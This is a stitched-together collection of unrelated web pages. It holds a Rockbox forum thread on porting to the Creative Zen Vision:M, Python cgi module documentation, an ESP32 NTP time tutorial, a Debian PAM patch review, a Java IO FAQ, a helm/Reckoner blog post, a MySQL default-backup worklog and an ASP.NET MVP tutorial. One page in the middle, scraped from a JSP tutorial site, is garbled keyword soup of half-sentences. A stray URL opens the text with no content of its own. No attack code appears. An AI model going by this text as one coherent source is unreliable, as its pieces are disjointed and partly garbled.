https://studytonight.com/cpp-programs/cpp-reading-from-a-file-program
Welcome to the Rockbox Technical Forums!

I committed a small part of the patch now that seemed clean and not likely to cause troubles for anyone else. Some parts of the remainder of the patch seem to modify stock dm320 code that isn't clean enough to commit. And then I'm not sure how valid the firmware/target/arm/tms320dm320/creative-zvm parts are. Comments? I just want to help getting the core vision:m stuff added so that more people can join in this effort and help easier.

The only DM320 stuff I changed are in system-dm320.c (which I've enabled back since it doesn't cause any trouble) and in spi-dm320.c (which sets M:Robe 500 target specific GIO stuff and disables GIO stuff using spi_disable_all_targets(), which isn't present at the ZVM and shouldn't be touched). As for the target/arm/tms320dm320/creative-zvm/ parts: these are just stubs so that Rockbox can compile (I haven't enabled these during boot in the bootloader).

Right, but those changes are unconditional and thus I don't dare to commit them since, for all I know, they may cause trouble in the mrobe 500 camp. Well, if they are truly only stubs I would rather see them as stubs only, and then I wouldn't mind committing them. Atm it seems like lots of leftovers from other parts that you probably used as basis when you copied these from elsewhere in Rockbox. I'm not really complaining, I'm just explaining my reasoning why I didn't commit more files (yet).

Hmm, are you using the compiler from TI or, uhm, well gcc-arm? Because I want to start taking a look at how I might use the code for my ZV. Btw, awesome work!
inline bool usb_detect(void)
{
    return ((*((volatile unsigned short*)(0x60FFC018))) & 0x100) >> 8;
}

edit2: I'm trying to compile a bootloader, but I'm getting: 'ERROR: x uses FPA instructions, whereas y does not' and other linker errors.
edit3: found it, apparently -mcpu=arm926ej-s should be -mcpu=arm9 (or at least on my machine)

Quote: edit3: found it, apparently -mcpu=arm926ej-s should be -mcpu=arm9

Hmm, I have the same errors here, but if I change arm926ej-s to arm9 in the makefile, it'll only change to even more errors saying ERROR: X uses VFP instructions, where....

Quote: edit3: found it, apparently -mcpu=arm926ej-s should be -mcpu=arm9

edit2: I'm afraid I can't check if it works because the firmware maker gets all sizes wrong...

Did you guys build your arm-elf toolchain with the rockboxdev.sh build script?

What do you mean by 'the firmware maker'? Scramble? CreativeWizard?

Oh yeah right, that's kind of ambiguous.. I meant Creative Wizard.

Edit: Where do you set LCD_HEIGHT and _WIDTH? More specifically IO_OSD_OSDWIN0OFST (the format is (LCD_WIDTH*bpp)/256 )
https://forums.rockbox.org/index.php/topic,3320.420.html?PHPSESSID=b344166292ab76926a86d968bda05244
Source code: Lib/cgi.py

Support module for Common Gateway Interface (CGI) scripts. This module defines a number of utilities for use by CGI scripts written in Python.

A minimal CGI script writes a header, a blank line, and then its output:

print("Content-Type: text/html")    # HTML is following
print()                             # blank line, end of headers
print("<title>CGI script output</title>")
print("<h1>This is my first CGI script</h1>")
print("Hello, world!")

Form fields are read through the FieldStorage class:

form = cgi.FieldStorage()
if "name" not in form or "addr" not in form:
    print("<h1>Error</h1>")
    print("Please fill in the name and addr fields.")
    return
print("<p>name:", form["name"].value)
print("<p>addr:", form["addr"].value)

If a field represents an uploaded file, accessing the value attribute or the getvalue() method reads the entire file in memory as bytes. This may not be what you want. You can test for an uploaded file by testing either the filename attribute or the file attribute. You can then read the data at leisure from the file attribute.

The module also exposes a few functions. These are useful if you want more control, or if you want to employ some of the algorithms implemented in this module in other circumstances.

cgi.parse() parses a query in the environment or from a file (the file defaults to sys.stdin). The keep_blank_values, strict_parsing and separator parameters are passed to urllib.parse.parse_qs() unchanged.

cgi.parse_multipart() parses input of type multipart/form-data (for file uploads). Arguments are fp for the input file, pdict for a dictionary containing other parameters in the Content-Type header, and encoding, the request encoding. Returns a dictionary just like urllib.parse.parse_qs(): keys are the field names, each value is a list of values for that field. For non-file fields, the value is a list of strings. This is easy to use but not much good if you are expecting megabytes to be uploaded — in that case, use the FieldStorage class instead which is much more flexible.

Changed in version 3.7: Added the encoding and errors parameters. For non-file fields, the value is now a list of strings, not bytes.

Changed in version 3.7.10: Added the separator parameter.

Some practical notes on installing and debugging CGI scripts:

- The script needs to be readable and executable by the web server; files it only reads need mode 0o644.
- When debugging, keeping tail -f logfile running in a separate window may be useful!
- You can test the script from the command line with python script.py.
- Add import cgitb; cgitb.enable() to the top of the script to get formatted tracebacks.
- PATH is usually not set to a very useful value in a CGI script.
- Some web servers provide a suexec feature that runs CGI scripts under the script owner's user id.
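The parse_qs behaviour described above (keys are field names, each value is a list of strings, because a field may repeat) can be checked directly with urllib.parse, which is where this module delegates query-string parsing:

```python
from urllib.parse import parse_qs

# A query string as a CGI script would receive it in QUERY_STRING.
qs = "name=Alice&addr=Wonderland&tag=a&tag=b&empty="

# Each value is a *list* of strings, because a field may repeat.
form = parse_qs(qs)
print(form["name"])   # ['Alice']
print(form["tag"])    # ['a', 'b']

# Blank values are dropped unless keep_blank_values is set.
print("empty" in form)                                # False
print(parse_qs(qs, keep_blank_values=True)["empty"])  # ['']
```

This is the same keep_blank_values switch that cgi.parse() passes through unchanged.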
https://getdocs.org/Python/docs/3.7/library/cgi
Every once in a while you'll come across an idea where keeping time is a prime concern. For example, imagine a relay that has to be activated at a certain time or a data logger that has to store values at precise intervals. The first thing that comes to your mind is to use an RTC (Real Time Clock) chip. But these chips are not perfectly accurate, so you need to do manual adjustments over and over again to keep them synchronized.

The solution here is to use Network Time Protocol (NTP). If your ESP32 project has access to the Internet, you can get date and time (with a precision within a few milliseconds of UTC) for FREE. You don't need any additional hardware.

What is an NTP?

NTP stands for Network Time Protocol. It's a standard internet protocol for synchronizing computer clocks to some reference over a network. The protocol can be used to synchronize all networked devices to Coordinated Universal Time (UTC) within a few milliseconds (50 milliseconds over the public Internet and under 5 milliseconds in a LAN environment).

Coordinated Universal Time (UTC) is a world-wide time standard, closely related to GMT (Greenwich Mean Time).

Architecture

NTP servers are arranged in a hierarchy of levels called strata. Each stratum in the hierarchy synchronizes to the stratum above and acts as a server for lower stratum computers.

How NTP Works?

NTP can operate in a number of ways. The most common configuration is to operate in client-server mode. The basic working principle is as follows:

- The client device such as ESP32 connects to the server using the User Datagram Protocol (UDP) on port 123.
- A client then transmits a request packet to an NTP server.
- In response to this request the NTP server sends a time stamp packet.
- A time stamp packet contains multiple pieces of information like the UNIX timestamp, accuracy, delay or timezone.
- A client can then parse out the current date & time values.

Preparing the Arduino IDE

Enough of the theory, Let's Go Practical!
But before venturing further into this tutorial, you should have the ESP32 add-on installed in your Arduino IDE. Follow below tutorial to prepare your Arduino IDE to work with the ESP32, if you haven't already.

Getting Date and Time from NTP Server

The following sketch will give you complete understanding on how to get date and time from the NTP Server. Before you head for uploading the sketch, you need to make some changes to make it work for you.

- You need to modify the following two variables with your network credentials, so that ESP32 can establish a connection with the existing network.

const char* ssid = "YOUR_SSID";
const char* password = "YOUR_PASS";

- You need to adjust the UTC offset for your timezone in seconds. Refer the list of UTC time offsets. Here are some examples for different timezones:
  - For UTC -5.00 : -5 * 60 * 60 : -18000
  - For UTC +1.00 : 1 * 60 * 60 : 3600
  - For UTC +0.00 : 0 * 60 * 60 : 0

const long gmtOffset_sec = 3600;

- Change the Daylight offset in seconds. If your country observes Daylight saving time set it to 3600. Otherwise, set it to 0.

const int daylightOffset_sec = 3600;

Once you are done, go ahead and try the sketch out.

#include <WiFi.h>
#include "time.h"

const char* ssid = "YOUR_SSID";
const char* password = "YOUR_PASS";

const char* ntpServer = "pool.ntp.org";
const long gmtOffset_sec = 3600;
const int daylightOffset_sec = 3600;

void printLocalTime() {
  struct tm timeinfo;
  if (!getLocalTime(&timeinfo)) {
    Serial.println("Failed to obtain time");
    return;
  }
  Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S");
}

void setup() {
  Serial.begin(115200);

  // connect to WiFi
  Serial.printf("Connecting to %s ", ssid);
  WiFi.begin(ssid, password);
  while (WiFi.status() != WL_CONNECTED) {
    delay(500);
    Serial.print(".");
  }
  Serial.println(" CONNECTED");

  // init and get the time
  configTime(gmtOffset_sec, daylightOffset_sec, ntpServer);
  printLocalTime();
}

void loop() {
  delay(1000);
  printLocalTime();
}

After uploading the sketch, press the EN button on your ESP32, and you should get the date and time every second as shown below.

Code Explanation

Let's take a quick look at the code to see how it works. First, we include the libraries needed for this project.

- WiFi.h library provides ESP32 specific WiFi methods we are calling to connect to network.
- time.h is the ESP32 native time library which does graceful NTP server synchronization.

#include <WiFi.h>
#include "time.h"

Next, we set up a few constants like SSID, WiFi password, UTC Offset & Daylight offset that you are already aware of. Along with that we need to specify the address of the NTP Server we wish to use. pool.ntp.org is an open NTP project great for things like this.

const char* ntpServer = "pool.ntp.org";

The pool.ntp.org automatically picks time servers which are geographically close for you. But if you want to choose explicitly, use one of the sub-zones of pool.ntp.org.

In the setup section, we first initialize serial communication with the PC and join the WiFi network using the WiFi.begin() function.

Serial.begin(115200);

// connect to WiFi
Serial.printf("Connecting to %s ", ssid);
WiFi.begin(ssid, password);
while (WiFi.status() != WL_CONNECTED) {
  delay(500);
  Serial.print(".");
}
Serial.println(" CONNECTED");

The getLocalTime() function is used to transmit a request packet to an NTP server and parse the received time stamp packet into a readable format. It takes a time structure as a parameter. You can access the date & time information by accessing members of this time structure.

void printLocalTime() {
  struct tm timeinfo;
  if (!getLocalTime(&timeinfo)) {
    Serial.println("Failed to obtain time");
    return;
  }
  Serial.println(&timeinfo, "%A, %B %d %Y %H:%M:%S");
}
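Under the hood, this follows exactly the protocol steps described earlier: send a 48-byte request over UDP port 123 and parse a timestamp out of the reply. The sketch below is my own Python illustration of that packet layout, not the ESP32 library code; NTP counts seconds from 1900, so 2,208,988,800 seconds are subtracted to convert to a UNIX timestamp.

```python
import struct

NTP_TO_UNIX = 2208988800  # seconds between 1900-01-01 and 1970-01-01

def build_request() -> bytes:
    # First byte: LI=0, version=3, mode=3 (client); the other 47 are zero.
    return bytes([0x1B]) + bytes(47)

def parse_transmit_timestamp(packet: bytes) -> float:
    # Transmit timestamp: 32-bit seconds + 32-bit fraction,
    # big-endian, at byte offset 40 of the 48-byte reply.
    secs, frac = struct.unpack("!II", packet[40:48])
    return secs - NTP_TO_UNIX + frac / 2**32

# To actually query a server you would send build_request() over UDP
# to port 123 (e.g. to pool.ntp.org) and pass the reply to the parser.
# Here we fake a reply whose transmit time is 2021-01-01 00:00:00 UTC.
fake = bytearray(48)
fake[40:48] = struct.pack("!II", 1609459200 + NTP_TO_UNIX, 0)
print(parse_transmit_timestamp(bytes(fake)))  # 1609459200.0
```

The fraction field is what gives NTP its sub-second resolution; dividing by 2**32 turns it into a fractional second.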
https://lastminuteengineers.com/esp32-ntp-server-date-time-tutorial/
Hi Igor,

On Sun, Oct 29, 2000 at 12:38:32AM -0400, Igor Khavkine wrote:
> Ok, I took heed of the comments that I received and I updated the patch.
> So here it is, less __GNU__ and more common sense. The patch should work
> for Linux and Hurd so it can be incorporated into the debian package right
> away; whether it should be submitted to the upstream maintainers should
> most probably be at the discretion of the debian maintainer.

It looks better now, but still there are some __GNU__ parts which are unnecessary, and can be fixed more nicely. PAM is using autoconf, right? So I would suggest to add a check for asprintf, or, maybe better, not to use asprintf at all but malloc (strlen(pwd->pw_dir) + sizeof(USER_RHOSTS_FILE) + 2) and sprintf. This should be done unconditionally on all systems, because there is no need to keep the code for a static buffer when the code to allocate a buffer dynamically works fine on "legacy" systems, too :). This is exactly what you did with the termio->termios conversion, and this part of the patch looks very clean and nice.

For MAXHOSTNAMELEN, I suggest an autoconf check for <net/if.h>, and include it only #ifdef HAVE_NET_IF_H. This removes one more __GNU__. For MAXDNAME I suggest #ifndef MAXDNAME instead of checking for __GNU__. For MAXHOSTNAMELEN, dynamic allocation can be enabled for all systems also (maybe there needs to be an additional check on systems which define MAXHOSTNAMELEN if the name is not too long, but often this check is done by library functions, and those errors are handled correctly and automatically in response to ENAMETOOLONG). Otherwise, if you disagree, enabling the dynamic code for systems which don't define MAXHOSTNAMELEN would also be a solution.

The use of getline is problematic, as it is a GNU extension. You need to #define _GNU_SOURCE to get it prototyped. There should be an autoconf check for this.
You can enable _GNU_SOURCE in autoconf like this (early in configure.in):

CFLAGS="-D_GNU_SOURCE $CFLAGS"

although I am not sure if this is the proper solution... mmh.

The use of __GNU__ is justified, as this is a real GNU shortage. But to give other short failing systems the same advantage this fix gives to us, it makes sense to use again a feature based check and not a system based one. So: ifdef __GNU__ -> ifndef SA_RESETHAND etc.

diff -ru Linux-PAM-0.72.orig/modules/pam_unix/unix_chkpwd.c Linux-PAM-0.72/modules/pam_unix/unix_chkpwd.c
--- Linux-PAM-0.72.orig/modules/pam_unix/unix_chkpwd.c	Tue Oct 24 23:23:01 2000
+++ Linux-PAM-0.72/modules/pam_unix/unix_chkpwd.c	Wed Oct 25 00:37:59 2000
@@ -51,6 +51,11 @@
 static void su_sighandler(int sig)
 {
+#ifndef SA_RESETHAND
+	/* emulate the behavior of the SA_RESETHAND flag */
+	if (sig == SIGILL || sig == SIGTRAP || sig == SIGBUS || sig == SIGSEGV)
+		signal(sig, SIG_DFL);
+#endif
 	if (sig > 0) {
 		_log_err(LOG_NOTICE, "caught signal %d.", sig);
 		exit(sig);
@@ -66,7 +71,9 @@
 	 */
 	(void) memset((void *) &action, 0, sizeof(action));
 	action.sa_handler = su_sighandler;
+#ifdef SA_RESETHAND
 	action.sa_flags = SA_RESETHAND;
+#endif
 	(void) sigaction(SIGILL, &action, NULL);
 	(void) sigaction(SIGTRAP, &action, NULL);
 	(void) sigaction(SIGBUS, &action, NULL);

Thanks,
Marcus

--
`Rhubarb is no Egyptian god.'  Debian  brinkmd@debian.org
Marcus Brinkmann               GNU     marcus@gnu.org
Marcus.Brinkmann@ruhr-uni-bochum.de
https://lists.debian.org/debian-hurd/2000/10/msg00405.html
IO Section Index | Page 6

How do I set a system property when using an executable jar (one with an entry of Main-Class: ClassName)?
Just like with executing a program, use the -D flag along with the -jar flag. Here is my test case: public class property { public static void main(String[] args) { System.ou..

How can I implement the Unix "cksum" command in Java?
I'm using a CheckedInputStream and creating a new instance of CRC32 to pass it, but I don't get the same checksum value as cksum gives me.

Is there any method in Java that will convert hexadecimal characters to binary characters?
You can use Integer.parseInt() or Long.parseLong() to convert a hexadecimal representation to a 4-byte int or an 8-byte long, respectively. For example, the Java class file magic number 0xCAFEBAB...

How do I append data to an existing file?
Check out java.io.FileWriter and java.io.FileOutputStream. They both have a constructor that takes a boolean parameter for appending or not the data.

Where can I learn (more) about Java's support for developing multi-threaded programs?

Where can I learn (more) about Java networking capabilities?

How do I change the working directory of a program from inside Java? Can I use "user.dir"?
The short answer is that you can't. Note that setting the "user.dir" in Java doesn't change the working directory - it only seems to ;). All it really does is update the path that the m...

How can I write a text document in PDF format?
The only third-party class library that I know of for doing this is called retepPDF. It can be found at.

How can I read a single character from the keyboard without having to press the 'enter' button and without using GUI classes like KeyListener?
The solution to this problem is OS dependent. On Win32 you would need to use JNI to call the SetConsoleMode function to disable the line buffering.
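On the cksum question above: the mismatch is expected, because Unix cksum does not compute the same CRC-32 as java.util.zip.CRC32 (the zlib-style CRC: reflected, all-ones initial value). POSIX cksum uses the same polynomial but unreflected, starts from zero, feeds the byte count into the register at the end, and then complements the result. A sketch of the POSIX algorithm (Python, just to show the difference; CheckedInputStream and CRC32 are fine for zlib-style checksums):

```python
import zlib

POLY = 0x04C11DB7  # same polynomial as zlib's CRC-32, but not reflected

def _feed(crc: int, byte: int) -> int:
    # Classic MSB-first, bit-at-a-time CRC update.
    crc ^= byte << 24
    for _ in range(8):
        if crc & 0x80000000:
            crc = ((crc << 1) ^ POLY) & 0xFFFFFFFF
        else:
            crc = (crc << 1) & 0xFFFFFFFF
    return crc

def posix_cksum(data: bytes) -> int:
    crc = 0                      # cksum starts from 0, zlib from 0xFFFFFFFF
    for b in data:
        crc = _feed(crc, b)
    n = len(data)
    while n:                     # the byte count is hashed in as well,
        crc = _feed(crc, n & 0xFF)   # least-significant octet first
        n >>= 8
    return ~crc & 0xFFFFFFFF

# Empty input: `cksum /dev/null` prints 4294967295; zlib's CRC-32 gives 0.
print(posix_cksum(b""), zlib.crc32(b""))  # 4294967295 0
```

So to reproduce cksum's output in Java you would have to implement this variant yourself rather than reuse java.util.zip.CRC32.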
For an example of using this method,

Are there any third-party Java classes that support reading and interacting with SVG files?
The Batik Toolkit from Apache lets you do this. See.

How can I examine or change file permissions and ownership using Java?
Standard Java provides no means to access or change file permissions / ownership. Short of using JNI, there is no way to access or preserve this information.
http://www.jguru.com/faq/core-java-technology/io?page=6
Reckoner

Nick Huanca

Recently I've been working on shoring up some of the user-experience and functionality of Reckoner, an open source tool that works in conjunction with helm to enable repeatable, declarative installation of helm charts onto kubernetes clusters. It also supports pointing to git repositories as a chart source, something which helm alone currently doesn't support.

A common use case is when you want to install nginx-ingress on a cluster and you want to be able to check all your chart values into source control. Below is an example of a course.yml, the definition file that reckoner uses to install charts.

# course.yml
charts:
  nginx-ingress:
    namespace: ingress-controllers
    version: 1.15.1
    values:
      controller.ingressClass: "my-ingress-class-name"

Running reckoner with reckoner plot course.yml will make sure helm installs nginx-ingress in your clusters with the settings you've provided. At Fairwinds we use reckoner to install core infrastructure to all our clusters and manage chart values for things related to that core infrastructure.

Since reckoner was started in python, we decided it would be too much work to port it to another language just for easier binary distribution. Luckily, PyInstaller allowed us to "compile" a self-contained binary that could be run on Linux or OS X systems. This made our lives so much easier for the installation story and has also helped with our end to end testing, which we now do in CircleCI with kind.

If you do try out reckoner and something is lacking, always feel free to reach out via dev.to or start a discussion in github issues! We've made changes to help people run reckoner in CI/CD and are always interested in how it can make people's lives just a tad easier. Thanks!
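To make the course.yml idea above concrete, here is a toy Python rendering of one chart entry into a helm command line. This is my own illustration, not reckoner's actual implementation (the real tool also handles repos, git chart sources, hooks and value files, none of which is modelled here), and plot_command is a hypothetical name:

```python
def plot_command(release, chart):
    """Render one course.yml chart entry into a helm invocation.

    Toy sketch: the release name is reused as the chart reference,
    and every value becomes a --set flag.
    """
    cmd = [
        "helm", "upgrade", "--install", release, release,
        "--namespace", chart["namespace"],
        "--version", str(chart["version"]),
    ]
    for key, value in chart.get("values", {}).items():
        cmd += ["--set", f"{key}={value}"]
    return cmd

# The nginx-ingress entry from the course.yml shown above.
entry = {
    "namespace": "ingress-controllers",
    "version": "1.15.1",
    "values": {"controller.ingressClass": "my-ingress-class-name"},
}
print(" ".join(plot_command("nginx-ingress", entry)))
```

The point of the declarative file is exactly this: the whole invocation, values included, lives in source control instead of in someone's shell history.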
https://practicaldev-herokuapp-com.global.ssl.fastly.net/nickhuanca/reckoner-1peg
connect Database...; mysql ; This query creates database 'usermaster' in Mysql. Connect JSP with mysql : Now in the following jsp code, you will see how to connect... Connect JSP with mysql     JSP Simple Examples in JSP An exception can occur if you trying to connect to a database... in JSP The while loop is a control flow statement, which allows code...: out> For Simple Calculation and Output In this example we have used paging in Jsp: jsp code - JSP-Servlet friend, pagination using jsp with database <...]; System.out.println("MySQL Connect Example."); Connection con...; } System.out.println("MySQL Connect Example."); Connection conn = null; String how to connect jsp with sql database by netbeans in a login page? how to connect jsp with sql database by netbeans in a login page? how to connect jsp with sql database by netbeans in a login page JSP code JSP code I get an error when i execute the following code : <... the following code its getting connected to database import java.sql.Connection... app only i am unable to connect the database. I am using Eclipse> jsp function - JSP-Servlet a simple example of JSP Functions Method in JSP See the given simple button Example to submit...:// JSP :// <jsp:useBean id="user.../jsp/simple-jsp-example/UseBean.shtml...how can we use beans in jsp how can we use beans in jsp   problem connect jsp and mysql - JSP-Servlet problem connect jsp and mysql hello, im getting an error while connecting jsp and mysql. I have downloaded the driver mysql-connector...; This is my code The error i get is as follows code - JSP-Servlet code how can i connect SQl database in javascript. and how to execute the query also i think u can not connect to SQL database in javascript. thanks sandeep How to connect mysql with jsp How to connect mysql with jsp how to connect jsp with mysql while using apache tomcat code - JSP-Servlet know how can i call database connection in javascript. 
please help me use some server side script like servlet or jsp, call these when user click in check box.in that u can connect to database.javascript is run on client machine jsp code - JSP-Servlet jsp code sample code for change password example Old Password: new Password: jsp jsp how to connect the database with jsp using mysql Hi Friend, Please visit the following links: Navigation in a database table through jsp . Create a database: Before run this jsp code first create a database named... Navigation in a database table through jsp This is detailed jsp code that shows how Connecting to MySQL database and retrieving and displaying data in JSP page Connecting to MySQL database and retrieving and displaying data in JSP page...; This tutorial shows you how to connect to MySQL database and retrieve the data from the database. In this example we will use tomcat version 4.0.3 to run our jsp code - JSP-Servlet jsp code sample code to create hyperlink within hyperlink example: reservation: train: A/C department non A/c Department jsp code - JSP-Servlet jsp code hello frns i want to display image from the database along... from database in Jsp to visit.... Thanks jsp - JSP-Servlet jsp i want to code in jsp servlet for login page containing username password submit and then change password.in this code how to maintain session...("password"); System.out.println("MySQL Connect Example simple bank application - JSP-Servlet simple bank application hi i got ur codings...But if we register a new user it is not updating in the database...so plz snd me the database also.... Thank you code for insert the value from jsp to access database code for insert the value from jsp to access database code for insert the value from jsp to access database Jsp - JSP-Servlet JSP date picker code I am digging for either a simple example or code to get the Date format in JSP Insert Image into Mysql Database through Simple Java Code Insert Image into Mysql Database through Simple Java Code... 
simple java code that how save image into mysql database. Before running this java code you need to create data base and table to save image in same database jsp code - Java Beginners JSP code and Example JSP Code Example the following links: JSP :// EL parser...Can you explain jsp page life cycle what is el how does el search JSP Simple Examples JSP Simple Examples Index 1. Creating.... Try catch in jsp In try block we write those code which can throw... page. Html tags in jsp In this example jsp code - JSP-Servlet ; For the above code, we have created following database tables...jsp code hi my requirement is generate dynamic drop down lists... statement? pls provide code how to get first selected drop down list value i want to add below code data in mysql database using jsp... using below code we got data in text box i want to add multiple data in database... Add/Remove dynamic rows in HTML table Retrieve image from mysql database through jsp to retrieve image from mysql database through jsp code. First create a database.... mysql> create database mahendra; Note : In the jsp code given below, image... Retrieve image from mysql database through unable to connect database in java unable to connect database in java Hello Everyone! i was trying to connect database with my application by using java but i am unable to connect... i was using this code.... try { Driver d=(Driver)Class.forName code to establish jdbc database connectivity in jsp code to establish jdbc database connectivity in jsp Dear sir, i'm in need of code and procedure to establish jdbc connectivity in jsp Simple problem to solve - JSP-Servlet Simple problem to solve Respected Sir/Madam, I am R.Ragavendran.. Thanks for your kind and timely help for the program I have asked... the code for ur kind refernce.. 
Here it is: EMPLOYEE</b> <% out.println("Unable to connect to database."); } %>...("Unable to connect to database."); } %> </font> </body> </html>...jsp Hi How can we display sqlException in a jsp page? How can we simple code for XML database in JS simple code for XML database in JS Sir , i want a code in javascript for XML database to store details (username and password entered by user during registration process (login process)). please send me a code . Thank you Simple JDBC Example ; } Simple JDBC Example To connect java application to the database we do...,'John',B.Tech') ; A Simple example is given below to connect a java...("MySQL Connect Example."); Connection conn = null; Statement stmt = null JSP - JSP-Interview Questions :// Thanks... This is simple code. A Comment Test A Test of Comments... are the comments in JSP(java server pages)and how many types and what are they.Thanks inadvance code for forget password JSP code for forget password I need forget password JSP code.. example for storing login and logout time to an account jsp code for storing login and logout time to an account I need simple jsp code for extracting and storing login and logout time in a database table...:// in JSP Code | Connect JSP with mysql | Create a Table in Mysql database... Windows Media Player | Connect JSP with mysql | Connect from database using... posted to a JSP file from HTML file | Accessing database from JSP | Implement Display Data from Database in JSP Display Data from Database in JSP This is detailed java program to connect java application with mysql database... jsp page. welcome_to_database_query.jsp <!DOCTYPE HTML PUBLIC " JSP Search Example code JSP Search - Search Book Example  ... the data from database. In this example we will search the book from database. We are using MySQL database and JSP & Servlet to create the application jsp jsp can u send the code to store search keywords from google server engine to my database
http://www.roseindia.net/tutorialhelp/comment/81442
The algorithm used if the engine does not provide any backup algorithm of its own. This is a blocking (i.e. it is not online) algorithm. The idea is to use handlerton methods to scan each table and get all its rows in binary format. These rows will be stored in the backup image and upon restore will be inserted into tables using handlerton write methods. To avoid the issue of data changing while tables are scanned, all tables will be blocked during the backup process.

The default backup mechanism should be implemented as a regular backup engine providing backup and restore drivers and implementing the backup API. The backup image will consist of several streams corresponding to the tables. Each stream will be a sequence of table rows as returned by handlerton read methods.

Note: apparently there are two row formats used by storage engines which differ in the way null field values are represented. For the backup image *only one format should be used*. So, rows stored in a different format should be repacked accordingly. Mats is a person who knows about this issue.

Since in this version default backup is blocking, it can pretend to be "at begin" type. Thus no data will be sent in the initial phase.

BACKUP API implementation
-------------------------

- init_size: Should be zero (but can be anything really).
- size: One can consider using statistical info to estimate the number of rows in each table and thus find out the approximate size of the whole backup image (not in the first version, though).
- prepare: The locking of the tables should be done here. No clear idea what is the best way of doing this...
- get_data: First call can return an empty block for stream 0 indicating end of the initial phase. The following calls should return rows from tables assigned to corresponding streams.
- lock: Do nothing.
- unlock: Do nothing.
- cancel: Cancel the process of creating the backup image: unlock tables, clean engine state.
RESTORE API implementation
--------------------------

- prepare: Do nothing (right now it is assumed that the backup kernel locks all tables to be restored).
- send_data: Unpack table rows and insert them into tables. One can assume that data blocks will be received in the same order in which they were sent when the backup image was created. Thus if one decides to backup tables one by one, they can be also restored one by one.
- continue: Not sure what needs to be done. After this call the engine should be ready for normal operation with all the newly inserted rows.
- cancel: Interrupt the restore process. All rows already put into the tables will remain there.

Implement in:

namespace backup {

  // Default backup engine
  class Default_Engine: public Engine {...};

  // Backup driver for default engine
  class Default_Engine::Backup: public Engine::Backup {...};

  // Restore driver for default engine
  class Default_Engine::Restore: public Engine::Restore {...};

};

An example of how to open and scan a table using its handler can be found in sql_help.cc.

---------------------------------------

The following is a simplified segment of the default backup algorithm:

int default_backup(THD *thd, TABLE_LIST *t)
{
  t->table = open_ltable(thd, t, TL_READ_NO_INSERT);
  t->table->file->extra(HA_EXTRA_RETRIEVE_ALL_COLS);
  t->table->file->ha_rnd_init(1);
  while (!t->table->file->rnd_next(t->table->record[0]))
  {
    /* write record buffer to file */
  }
  t->table->file->ha_rnd_end();
}

This rough outline of my algorithm is missing the normal locking and other error handling (it's there, I just omitted it for brevity). I am pretty sure all of the storage engines support these handlerton methods. The only one I'm not sure about is NDB, but it appears to support them.
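The worklog's scheme (one stream per table, each stream a sequence of rows in a single binary format, restored by inserting rows in the order they were written) can be sketched abstractly. The Python below is my own illustration; the length-prefixed framing is invented for the sketch and is not the actual MySQL backup image format:

```python
import struct

def backup(tables):
    """Serialize {table_name: [row_bytes, ...]} into one image blob.

    Each row is length-prefixed; tables are written one after another,
    which is what lets restore proceed in the same order.
    """
    image = b""
    for name, rows in tables.items():
        nb = name.encode()
        image += struct.pack("!H", len(nb)) + nb
        image += struct.pack("!I", len(rows))
        for row in rows:
            image += struct.pack("!I", len(row)) + row
    return image

def restore(image):
    """Walk the image in write order and rebuild every table."""
    tables, pos = {}, 0
    while pos < len(image):
        (nlen,) = struct.unpack_from("!H", image, pos); pos += 2
        name = image[pos:pos + nlen].decode(); pos += nlen
        (nrows,) = struct.unpack_from("!I", image, pos); pos += 4
        rows = []
        for _ in range(nrows):
            (rlen,) = struct.unpack_from("!I", image, pos); pos += 4
            rows.append(image[pos:pos + rlen]); pos += rlen
        tables[name] = rows
    return tables

data = {"t1": [b"row-a", b"row-b"], "t2": [b"\x00\x01"]}
assert restore(backup(data)) == data
```

Because restore only ever moves forward through the blob, it mirrors the worklog's assumption that send_data receives blocks in exactly the order get_data produced them.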
http://dev.mysql.com/worklog/task/?id=3570
The full source code for this tutorial is available at my github at.

MVP - the "Model-View-Presenter" pattern, like the MVC pattern, is used to separate business logic from the application and presentation layer. For a quick walkthrough of the MVP pattern, visit the following link:

Now let's move on to how I've implemented this pattern for ASP.NET. The implementation consists of two base-classes and an item template for Visual Studio that you can drop in your template directory. The template will then show up with the name "Mvp form" when you choose to create a new Web item in your project.

If you were to create a new form with the name Default.aspx you would get the following files:

Default.aspx
Default.aspx.cs
Default.aspx.designer.cs
Default.aspx.presenter.cs
Default.aspx.view.cs

The first three files you'll recognize as the standard .NET files for a webform. The two at the bottom are the additional files needed to conform to the MVP pattern. Now let's map these files against the MVP pattern and see which file implements which part.

Default.aspx.cs - The view
Default.aspx.view.cs - The view interface
Default.aspx.presenter.cs - The presenter

The model is your business logic and should not be grouped with the page. Let's now quickly examine the code that the item template generates for the different files, and then build a simple example with it.

Default.aspx.cs - The view

public partial class Default : MvpView<DefaultPresenter, IDefault>, IDefault
{
    protected void Page_Load(object sender, EventArgs e)
    {
    }
}

As we can see, the code-behind now inherits the generic class MvpView instead of the standard System.Web.UI.Page. The generic base-class is supplied with the type of the presenter and the view interface, which allows the base-class to create a new presenter object in its constructor, ready for use by the view.
public abstract class MvpView<TPresenter, TView> : Page
    where TPresenter : MvpPresenter<TView>
{
    /// <summary>
    /// Gets/sets the current presenter for the view.
    /// </summary>
    public TPresenter Presenter { get; set; }

    /// <summary>
    /// Default constructor. Creates a new MVP view.
    /// </summary>
    public MvpView() : base()
    {
        if (!(this is TView))
            throw new Exception("MvpView must implement the interface provided as the generic TView type");

        // Create and initialize presenter
        Presenter = Activator.CreateInstance<TPresenter>();
        Presenter.View = (TView)((object)this);
    }
}

Default.aspx.view.cs - The view interface

public interface IDefault
{
}

As we can see, the view interface doesn't contain anything at this point, but we'll get to this shortly when we create our simple example.

Default.aspx.presenter.cs - The presenter

public class DefaultPresenter : MvpPresenter<IDefault>
{
}

The presenter inherits the generic class MvpPresenter, to which we provide the same view interface as we provided to the view implementation. This allows the base-class to contain a typed property for the current view object.

public abstract class MvpPresenter<T>
{
    /// <summary>
    /// Gets/sets the current view.
    /// </summary>
    public T View { get; set; }

    /// <summary>
    /// Default constructor. Creates a new presenter without an assigned view.
    /// </summary>
    public MvpPresenter() {}

    /// <summary>
    /// Creates a new presenter for the given view.
    /// </summary>
    /// <param name="view">The view</param>
    public MvpPresenter(T view)
    {
        View = view;
    }
}

So, how about that example then? Sure. First of all, we'll add a simple Label to our asp-page; let's call it lblName. No need to show that, as you all know how to do it. Second, let's add a property for the name in our view interface, like this:

public interface IDefault
{
    /// <summary>
    /// Gets/sets the current name.
    /// </summary>
    string Name { get; set; }
}

In order for everything to compile, we need to add an implementation for this to our view:

